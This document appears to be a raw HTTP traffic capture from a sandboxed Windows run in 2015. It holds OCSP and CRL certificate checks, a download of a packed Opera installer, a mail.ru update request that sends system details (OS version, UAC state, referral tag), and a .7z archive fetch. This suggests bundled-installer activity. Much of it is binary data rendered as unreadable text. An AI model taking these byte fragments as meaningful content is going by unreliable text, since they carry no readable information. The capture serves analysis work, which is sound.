Expires: Tue, 24 Feb 2015 19:02:34 GMT

ETag: "06db3b9638f50546280da580976f768abab116c4"

Content-Length: 1895

Connection: close

Content-Type: application/ocsp-response

0..c......\0..X.. .....0.....I0..E0......0..1.0...U....US1.0...U....Ar
izona1.0...U....Scottsdale1.0...U....GoDaddy.com, LLC1-0 ..U...$http:/
/certs.godaddy.com/repository/1 0)..U..."Go Daddy Validation Authority
 - G2..20150223070234Z0j0h0@0... ..........._lkv...8..f..R34N..@..'..4
.0.3..l...,.......d.......20150223070234Z....20150224190234Z0...*.H...
...............uL..'...Ya:.'Mt.=8..,..\..........L.SK.......B....z....
..GK.3...\h..@E.{...DI.C.)........y......8....4.>dm..h.V.'...h.3S!#
~....v;W..N,hK.....!U..K..?....7.T...}yG.. ..........h. ...:.j........
..Up..32@)..4........5@K..:..(1..hM.N.Ry.......#........ j.....0...0..
.0..........$..0...*.H........0..1.0...U....US1.0...U....Arizona1.0...
U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.god
addy.com/repository/1301..U...*Go Daddy Secure Certificate Authority -
 G20...140401070000Z..150401070000Z0..1.0...U....US1.0...U....Arizona1
.0...U....Scottsdale1.0...U....GoDaddy.com, LLC1-0 ..U...$hXXp://certs
.godaddy.com/repository/1 0)..U..."Go Daddy Validation Authority - G20
.."0...*.H.............0..........?.........'' ...X....0.........T..W.
...........,\...zZ./h....W......>.......Z..K....n..$Us..Y..e..b_I|T
.....$.>....%D$.3..$....*.|)........S..$A.e<...r..rE)....(...C[V
.........~`C.........L....\....W......M....w.Zk......h. i.....J..n....
.....u.....K)...E.........0...0...U.......0.0...U...........0...U.%..0
... ......... .......0...U......wI.p......!.(..d.tT(0...U.#..0...@..'.
.4.0.3..l...,..0... .....0......01..U...*0(0&.$.". hXXp://crl.goda

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBS56bKHAoUD+Oyl+0LhPg9JxyQm4gQUf9Nlp8Ld7LvwMAnzQzn6Aq8zMTMCEGxZ76nhAOEO4wa6j+ApJVk= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: ocsp.verisign.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1762

content-transfer-encoding: binary

Cache-Control: max-age=346718, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 09:47:33 GMT

Expires: Fri, 27 Feb 2015 09:47:33 GMT

Date: Mon, 23 Feb 2015 09:31:24 GMT

Connection: keep-alive

0..........0..... .....0......0...0......;O}a.!..u...au..eUNp..2015022
0094733Z0s0q0I0... ...................B.>.I.$&.....e......0..C9...3
13..lY...........)%Y....20150220094733Z....20150227094733Z0...*.H.....
........:...3..\..a..^..V..b.Y5....l..Hw...'.......i..d5...HN........R
R8r...T1...m ..pdhc.S.....yJ^..f...\lt.....a</..lV....r..;P.).z....
".k% .X....-.09r.{.?>5u...a"*.b..38....U\.T\...;\..8{..........:.q.
....U.#...o..V..=...y..Pz}.q[..DCh..?W..9..l.....5...?.i..C.....0...0.
..0...........2...'U.BM...g.B0...*.H........0..1.0...U....US1.0...U...
.VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2006 Ve
riSign, Inc. - For authorized use only1E0C..U...<VeriSign Class 3 P
ublic Primary Certification Authority - G50...141202000000Z..151216235
959Z0..1.0...U....US1.0...U....Symantec Corporation1.0...U....Symantec
 Trust Network1?0=..U...6Symantec Class 3 PCA - G5 OCSP Responder Cert
ificate 30.."0...*.H.............0...............2&..PL...,..2....:..t
H...`JG.%..*...s.c%...?t..J..0.q....~..k@X.l.i....0..kk..h.9"1.5?..s..
...3[...u......]...R0..Z}....l..I.Y.....j\H.q...#.uw.4qz.#.J.....@2$".
.$l.B.......D.ye..(..2.........@...... ...."... E..0M,..b{.^..s'....f.
6.pr4.J........'j..........0...0...U.......0.0l..U. .e0c0a..`.H...E...
.0R0&.. .........hXXp://VVV.symauth.com/cps0(.. .......0...hXXp://VVV.
symauth.com/rpa0...U.%..0... .......0...U...........0... .....0......0
!..U....0...0.1.0...U....TGV-B-2760...U......;O}a.!..u...au..eUNp0...U
.#..0.....e......0..C9...3130...*.H.............(.&..Dgr.Ve..#...5

<<< skipped >>>

GET /opera/stable?utm_medium=pb&utm_source=turbo&utm_campaign=turbo_newNI HTTP/1.1

User-Agent: Downloader 7.2

Host: net.geo.opera.com

Cache-Control: no-cache


HTTP/1.1 200 OK

Server: nginx/1.2.1

Date: Mon, 23 Feb 2015 09:31:19 GMT

Content-Type: application/octet-stream

Connection: keep-alive

Content-Length: 712808

Content-Transfer-Encoding: Binary

Content-disposition: attachment; filename="Opera_NI_stable.exe"

MZ......................@................................... .........
..!..L.!This program cannot be run in DOS mode....$.........a.;...;...
;.......>...6.......6.......6...w.......9.......?.......:...}...<
;...;...............F..."...F.......F.......6...:...;...9...F...:...Ri
ch;...........PE..L...%S.T.........."......0.......@...r...P........@.
......................... ......{@....@...............................
..............................h....................................t..
.....u..H...................<...`...................UPX0.....@.....
.........................UPX1.....0...P...&..................@....rsrc
................*..............@......................................
......................................................................
......................................................................
......................................................................
......................................................................
................3.91.UPX!....l....f/.rQ..."......&!......h.....!...Y.h
......A........!..l..R.-.!...dHv..P.{a..E/.@..........`.........x...Y.
0..,`...?.....6y..?.?.X...........u.......|.=....s...x.....ow.........
......R'.U...,....w.w.......]..]..M...LL.1...M..8.a9.j.R.{c..SSW;`!E;.
..94%l..xz3...z.f..x.........SSR.S.8.f..E.P.......QKxJ9].uE4j-4$..]h..
..4P;..>...p&...M.....Ap....V....:^f..........v8.....R@....3.j...%.
...F...,.N...~.V....f..$....;.....p.....v*.."ea.s...9[.M........Q.Q..U
...........y8.Q.D.R-..Y.....@3....f....v..mY....{....T0.1$.K.B...O

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEDe+2HQUBMnr81Cg/dygBNE= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=500405, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 04:32:35 GMT

Expires: Sun, 1 Mar 2015 04:32:35 GMT

Date: Mon, 23 Feb 2015 09:35:33 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
2043235Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...7..t.....P..........20150222043235Z....20150301043235Z0...*.H.....
............}.p.U$-.i........0>..iZ..d.f2M'..p...._j..............7
`6.~}L....q.....>..@.@n....K.I.Rd...........$. .Y....!|.F./,.M9...&
gt;m[s..rZ..PE...|$Ix....:?*.B.cq.]8..g......][..)..l.a........ %V.;.6
..Wp.@......._..n.l....I.#.....b.K..R3.`......;......T..e..p`......0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-....
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=545089, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 16:57:49 GMT

Expires: Sun, 1 Mar 2015 16:57:49 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
2165749Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...O..Z.}.~......;.....20150222165749Z....20150301165749Z0...*.H.....
.........}.8..,..5..VSd......D.../...e....u(...>{Po.|.._y@?.}...kN?
.nC...,A.g......|.Z"......h...n..(.......Y.................O(/g..HL...
.5W..Os.O'.......'.Yi#.......6X.m..I".o.#.K.Jv}....."w.x..6.. .}...*.?
............ ...Cb.....f.z...y.h..R..%.yR.../U.%T..H..1v.....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-....
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCECJe6gdYhONI6dBjwD1kE+o= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=474265, public, no-transform, must-revalidate

Last-Modified: Sat, 21 Feb 2015 21:17:36 GMT

Expires: Sat, 28 Feb 2015 21:17:36 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
1211736Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U..."^..X..H..c.=d......20150221211736Z....20150228211736Z0...*.H.....
.........k....?y..G.M.....l..&.......m.....I|....uC.b3.Q..<Ta.{NP.I
R<............z....L.k..Q...q..;Q.`%.I..y.....,JS.-..2.#.....3.....
.].......{<.%.......@..m....d....M..'...z...6.nb.....2{d.-p.G7...?*
u0.......gNu...Q.!.k..Wv ...h.,...*j..1..........b..s....d.Y.n.....0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-....
<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=545089, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 16:57:49 GMT

Expires: Sun, 1 Mar 2015 16:57:49 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
2165749Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...O..Z.}.~......;.....20150222165749Z....20150301165749Z0...*.H.....
.........}.8..,..5..VSd......D.../...e....u(...>{Po.|.._y@?.}...kN?
.nC...,A.g......|.Z"......h...n..(.......Y.................O(/g..HL...
.5W..Os.O'.......'.Yi#.......6X.m..I".o.#.K.Jv}....."w.x..6.. .}...*.?
............ ...Cb.....f.z...y.h..R..%.yR.../U.%T..H..1v.....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-..<<< skipped >>>

GET /MEQwQjBAMD4wPDAJBgUrDgMCGgUABBSxtDkXkBa3l3lQEfFgudSiPNvt7gQUAPkqw0GRtsnCuD5V8sCXEROgByACAwI6bw== HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: g2.symcb.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1363

content-transfer-encoding: binary

Cache-Control: max-age=498978, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 04:07:36 GMT

Expires: Sun, 1 Mar 2015 04:07:36 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..O......H0..D.. .....0.....50..10......7).nj./P(.3.\\.;.B....2015022
2040736Z0f0d0<0... ..........9.....yP..`...<.......*.A.....>U
....... ...:o....20150222040736Z....20150301040736Z0...*.H............
...|..Q.q._...cb\wD....n.X.f.X@......c..h..y..2q.j...9..`.l.;.I..J.. .
{.".........Y0.[.[."..l.....zv...Yg._k..0.v...G.u........!.:....*.~.N[
.....?:........S.#8n2M.;..G...'....L@.........GAq..%.....?.JS.k......i
...r@%..[.....Y2.w........,:.y..9....L.......w.....0...0..}0..e.......
.:}0...*.H........0B1.0...U....US1.0...U....GeoTrust Inc.1.0...U....Ge
oTrust Global CA0...141201130534Z..151216130534Z02100...U...'GeoTrust 
Global CA TGV OCSP Responder 30.."0...*.H.............0............\.h
pc..J.a.j-.t......F`Aw...)L.YE.2..~..-...2.Y(.".CZ.w..T..Y. syd.....x.
.YE..<....lwv.:J.76>U....uF.a.|8N.. ..1p...`f.X...B>x........
......6..m.&...'..W.plK....[.m.V..h..lI.........?~.....>.|'....o...
A!.Pm.*.N ...<.....3...*|.x._..1..m.W<*....._S.............0..0.
..U.#..0....z.h.....d..}.}e...N0... .....0......0...U.%..0... .......0
...U...........0...U.......0.0!..U....0...0.1.0...U....TGV-B-2830...*.
H.............~....2!...V..0...Y....L..k....z}~a.3Y.x..dS.L...Dk$a...n
R9_......B......m....Y....U.5....'.....<{....v&=.2].....j*.r(7...=.
.w.I...z....\.#.J.ac.....I.[.[....6.X....0...g.3d...z.i.H..f...v.....\
.....^.N..1.J<.)`Z.....4.-.E..n.E.~t....v.e.T...?. ......i..%....<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEB46A3HdHEXOiQww+nhhjfk= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=340814, public, no-transform, must-revalidate

Last-Modified: Fri, 20 Feb 2015 08:12:19 GMT

Expires: Fri, 27 Feb 2015 08:12:19 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
0081219Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U....:.q..E...0.xa......20150220081219Z....20150227081219Z0...*.H.....
........./Ql[......[d"|...).hW.,5....U.ez.v?R.v&?.r....=..i...'.....V.
h_R.0...|.N.bI.5.b.K.:$K.[B......f.....u$=@.6.GE..J..*C.o!..hD.(<.\
...vC]X.@.r6.B......\.. .,.L..%..p....I.>....).y!...c.K:?....xS7^..
]..# .......2]..U......(...bq..........V>..},^.G................0..
.0...0..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U.
...GeoTrust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504
06235959Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SS
L CA - G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._.
..>.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6
'.e.....3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8..
.~WL..%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M...
..=RE...Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.
%..0... .......0...U...........0... .....0......0"..U....0...0.1.0...U
....TGV-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G
...~.2.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.
^.a..)OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N
.4....RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G
..O.1....OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>
;.*&-8-..<<< skipped >>>

GET /ocsp/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih+ZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCBB4deWARfX0 HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: clients1.google.com


HTTP/1.1 200 OK

Content-Type: application/ocsp-response

Date: Fri, 20 Feb 2015 18:20:23 GMT

Expires: Tue, 24 Feb 2015 18:20:23 GMT

Server: ocsp_responder

Content-Length: 463

X-XSS-Protection: 1; mode=block

X-Frame-Options: SAMEORIGIN

Age: 227713

Alternate-Protocol: 80:quic,p=0.08

Cache-Control: public, max-age=345600

0..........0..... .....0......0...0......J......h.v....b..Z./..2015022
0130626Z0k0i0A0... ..........j.....p.I.#z...(~d..J......h.v....b..Z./.
..xu..E......20150220130626Z....20150227130626Z0...*.H..............Q.
.\.(....v..]...Eo..Wfo.A..E...../;r.H....../...1.3p....gK..R.;...?....
....b..Uz.....:...*>v..v............  .k..__.^'..v>..-....T.....
L.{a."Xs.c........A.....'.Q-.{....eFcalV.b3.tsN.u.6q...p..e..y..j.....
.Z.oz........7............m..v.I..z.o.Y...a'.@7.DHTTP/1.1 200 OK..Cont
ent-Type: application/ocsp-response..Date: Fri, 20 Feb 2015 18:20:23 G
MT..Expires: Tue, 24 Feb 2015 18:20:23 GMT..Server: ocsp_responder..Co
ntent-Length: 463..X-XSS-Protection: 1; mode=block..X-Frame-Options: S
AMEORIGIN..Age: 227713..Alternate-Protocol: 80:quic,p=0.08..Cache-Cont
rol: public, max-age=345600..0..........0..... .....0......0...0......
J......h.v....b..Z./..20150220130626Z0k0i0A0... ..........j.....p.I.#z
...(~d..J......h.v....b..Z./...xu..E......20150220130626Z....201502271
30626Z0...*.H..............Q..\.(....v..]...Eo..Wfo.A..E...../;r.H....
../...1.3p....gK..R.;...?........b..Uz.....:...*>v..v............  
.k..__.^'..v>..-....T.....L.{a."Xs.c........A.....'.Q-.{....eFcalV.
b3.tsN.u.6q...p..e..y..j......Z.oz........7............m..v.I..z.o.Y..
.a'.@7.D..

<<< skipped >>>

GET /pca3.crl HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: crl.verisign.com


HTTP/1.1 200 OK

Server: Apache

ETag: "66304c4a5660ab8615727e6bb27b3cdb:1418950819"

Last-Modified: Fri, 19 Dec 2014 01:00:19 GMT

Date: Mon, 23 Feb 2015 09:36:10 GMT

Content-Length: 933

Connection: keep-alive

Content-Type: application/pkix-crl

0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc.1705..U
....Class 3 Public Primary Certification Authority..141210000000Z..150
331235959Z0..x0!...v....a_>..2......020924164823Z0!.....A.....{2..Y
.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y..q.....
..fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!............R
.e.53..010207212458Z0!..!......Y...ISi....010706171411Z0!..$-..I{r....
u<._...080403172226Z0!..&.."?..y..51}..1..010706172118Z0!..4....2..
..{W......080605175030Z0!..B....c............070411175910Z0!..H.Py...N
....* ....010207212031Z0!..N....-.1Gq.@...C..040401175251Z0!..Y......w
`G........070411175657Z0!..Z`..H.@B....Z.*q..080403172017Z0!..l....I..
.Y..] .c..010706171749Z0"......T=deQ...1u.]...010207212247Z0".....p..1
..7<.....e..010207211822Z0...*.H............5..v...V.._)....A... ..
..>.5]....6.(.0uFW.*:T...6$.....R...Y.N.k........%Jn..I.j*.6.3~...r
../=l..?...9..V0..@Tk......fn?....0.A.HTTP/1.1 200 OK..Server: Apache.
.ETag: "66304c4a5660ab8615727e6bb27b3cdb:1418950819"..Last-Modified: F
ri, 19 Dec 2014 01:00:19 GMT..Date: Mon, 23 Feb 2015 09:36:10 GMT..Con
tent-Length: 933..Connection: keep-alive..Content-Type: application/pk
ix-crl..0...0...0...*.H........0_1.0...U....US1.0...U....VeriSign, Inc
.1705..U....Class 3 Public Primary Certification Authority..1412100000
00Z..150331235959Z0..x0!...v....a_>..2......020924164823Z0!.....A..
...{2..Y.#..140129175709Z0!...,.|.|...<...j ...080605174907Z0!...`y
..q.......fh...020923171400Z0!...?A....a.nF`.P....020923171548Z0!.

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQSBA0TLeT5Hrk8v73bcU3oAZux9AQUEUrQcznVW2kIXLo9v2SaqIscVbwCEE/s61qLfe5+gLSurb7nO5U= HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: gb.symcd.com


HTTP/1.1 200 OK

Server: nginx/1.4.7

Content-Type: application/ocsp-response

Content-Length: 1456

content-transfer-encoding: binary

Cache-Control: max-age=545138, public, no-transform, must-revalidate

Last-Modified: Sun, 22 Feb 2015 16:57:49 GMT

Expires: Sun, 1 Mar 2015 16:57:49 GMT

Date: Mon, 23 Feb 2015 09:35:36 GMT

Connection: keep-alive
0..........0..... .....0......0...0.........b../..J.G...~.2.L..2015022
2165749Z0s0q0I0... ............-....<...qM........J.s9.[i.\.=.d....
U...O..Z.}.~......;.....20150222165749Z....20150301165749Z0...*.H.....
.........}.8..,..5..VSd......D.../...e....u(...>{Po.|.._y@?.}...kN?
.nC...,A.g......|.Z"......h...n..(.......Y.................O(/g..HL...
.5W..Os.O'.......'.Yi#.......6X.m..I".o.#.K.Jv}....."w.x..6.. .}...*.?
............ ...Cb.....f.z...y.h..R..%.yR.../U.%T..H..1v.....0...0...0
..........w..X.G.&..kRiD.S0...*.H........0D1.0...U....US1.0...U....Geo
Trust Inc.1.0...U....GeoTrust SSL CA - G20...150106000000Z..1504062359
59Z0S1.0...U....US1.0...U....GeoTrust Inc.1,0*..U...#GeoTrust SSL CA -
 G2 OCSP Responder0.."0...*.H.............0.........%p.O..U{b._...>
.f...M....y#..~iN.c......uF.!H.S.^.=...39..w.!.SPD........1%...6'.e...
..3k.)..m.......d.w2....\PMh....q>.f....v.........L...Y..~8...~WL..
%/.q.....V.......l*.Qr......w.X:9....b...p.0....cu..........M.....=RE.
..Nq...yqMtje..mj....W.z.D/..5g.k........0..0...U.......0.0...U.%..0..
. .......0...U...........0... .....0......0"..U....0...0.1.0...U....TG
V-B-27550...U.#..0....J.s9.[i.\.=.d....U.0...U.........b../..J.G...~.2
.L0...*.H.............E.L.W..;..C@..?....JF;.@.J..n...........a.^.a..)
OB...|..f.../9.Q...:_-7....yG...FF...[.^.@...QCd.w......$x.....N.4....
RjP....r ......@..6t.$.2..Lb ...RZ..6.....2T|..L......z....:q!.G..O.1.
...OCC:...Z1,%.H..ri...'E.(.j.....6..i.o...9...KWQ..G..0..f..>.*&-8
-..<<< skipped >>>

GET /update/2/version.txt?type=prog_set&GUID={719968E8-AEBE-49A6-B040-FB3879941DE0}&rfr=blackbear1&osver=7&osbit=64&osvernum=6.1&ossp=ServicePack1&uac=0&ver=2.9.0.161&praetorian=0&qipguard=0&yabrman=0&comp_mem=2047&tool_mem=11&tool=sputnik&target=op_start&prog=mail&target_ver=27.0.1689.69 HTTP/1.1

Host: mrds.mail.ru

Accept: */*

User-Agent: FULLSTUFF

Connection: close


HTTP/1.1 204 No Content

Server: nginx

Date: Mon, 23 Feb 2015 09:35:27 GMT

Connection: close

GET /go_chvbm6.7z HTTP/1.1

Host: xtnmailru.cdnmail.ru

Accept: */*

Range: bytes=0-3904817

User-Agent: mailrutool

Connection: close



`.".<.xu..2r&L....D..3.dX......O,..R8l.kQ...A....j.}p....uJZ...{x..
(...nu..5M.........b...A7*..q...... 2 ......$...~..1..^|....80...J..`.
 ...]..........k.OBqU.L6A...VO......Y.!...qj..h~2.......H....-7N'".9..
..:Ur-.z.....*.......}W.s....3...9.......5s.....G7.:V.*8F.L...uk......
3.6s...S....=......S8..]. ".k.....=.).7......'.o.o..G..(i.."J.Y......6
.x..._.P....i.!.t......5Y.Rt....6...6Db@.ovb..'v.8...$#.....|.. <.9
.......(....^g...sZB...xk..V.#......[...........W..y.Z...<o...$....
..-e.7....I...kQ.e......f.#k..S.j.f..5G}..&...v.....L.=.B../I..E.f){8.
,...<|..yL.....F(>..........S....._*...".$Im...|.....AL|......P.
...:...4.......^.1Ax..]....K.w...Ii.@%.EI.p..[.e....\l..\V...o......L}
...._..9.n~.s9._ep...89-..q..{..-.cD.m;..E...J...c..@......E_.....0.H.
q.b.oX.'.=Q.}w......x...../^...."..a.D...e?C....\............3.......x
....6Ni........?.%G..9.@.)..{..roF......i|.9HH ...]o.3...S.1nX...:..$.
..U...........N..p....i~...T.<._`........hI..s....6..d.1..{..<Y.
.f.M......[......$.......mlW..^..C..;. s....N.B^....a.0[...."...N.....
.Z.'....G.9 .J6.......?.....^...U.^.......s&.zV..#....!......dg../4.p.
..#...Ui.`.....p...`.5.. .,.....s..(..|.] 8.g...{.........:....Py....H
.#.~l@&...@..L.F1.].Ah.P.....2m."P.. W......Q..m...AL.$....... ....R..
.......u...0............."Kg.0uk:.cv..A....Kh.>.....O..H.g.<.#..
f...AB..........}P..a.T..MGfsQx.H..8S....E...&.w.t.....'...>.VoT.dz
